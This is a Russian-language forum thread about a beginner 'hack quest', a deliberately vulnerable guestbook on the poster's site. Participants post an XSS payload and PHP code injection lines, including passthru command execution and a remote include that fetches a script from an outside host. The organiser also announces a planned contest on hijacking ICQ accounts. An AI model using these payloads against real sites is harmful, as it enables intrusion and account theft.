|
Хак квесты
http://www.mrthe.tu1.ru/
или http://www.p1zda.org.ua/ или http://www.mrthe.org.ua/(щас временно неработает) От нечего делать замутил хак квест. ооочнь простой. и из одного задания. Дизайна на сайте никакова нет. Пишем комменты про тест и незабываем шо он сделан для новичков. |
Люди!..
Где дэфейсы? Это же так просто! |
как я понял данные записываются в gbook.list, который потом инклудится.
но тут одно проблема - если натыкать много php кода - скрипт просто не будет работать.... Код:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/tu1.ru/m/mr/mrthe/htdocs/www/gbook.list on line 2 |
Цитата:
пока вы ломаете этот конкурс я делаю дргугой. по угону icq. так как у меня есть из номеров только кривая восьмёра то ищу тех кто это проспонирует. стучать сюда [11889888] и ещё. в скором времени на сайт будут натянут дизайн |
Интерфейс частично натянут. сам квест пока будет без диза. в новом квесте диз будет. кстати спонсора ищу до сих пор. его баннер будет висеть на главной моего сайта)
и маленькая подсказка к этому квесту. обрати внимание на gbook.list |
Ну че там какие-то мыла, что с ними делать
добавляем в сообщение вот это "><script>alert(xss)</script> и все=) и гостевая взломана! |
ты зоебал, 3 раз захожу, втыкаю пшп код, и бля геста накрывается ))
<? phpinfo(); ?> фурычит, а если тыкаю что либо наподобии <? @include("http://gbl.nightmail.ru/rst.php"); ?> либо <? passthru("pwd;ls -la"); ?>, то ей настоет 3.14зда.. разберись сначала сам со своим квестом, а лучше не делай такого больше..;) какой то придурок там ксс тестил ) кавычки коверкаются, поэтому лажа =\ |
Ашипка! ГЫ ГЫ
|
Начнём с таво шо там экранируются кавычки. и закончим тем шо в гослевуху ничё инклудить ненадо
|
Parse error: syntax error, unexpected '<' in /home/tu1.ru/m/mr/mrthe/htdocs/quest1/gbook.list on line 1
o_0 |
| Время: 06:26 |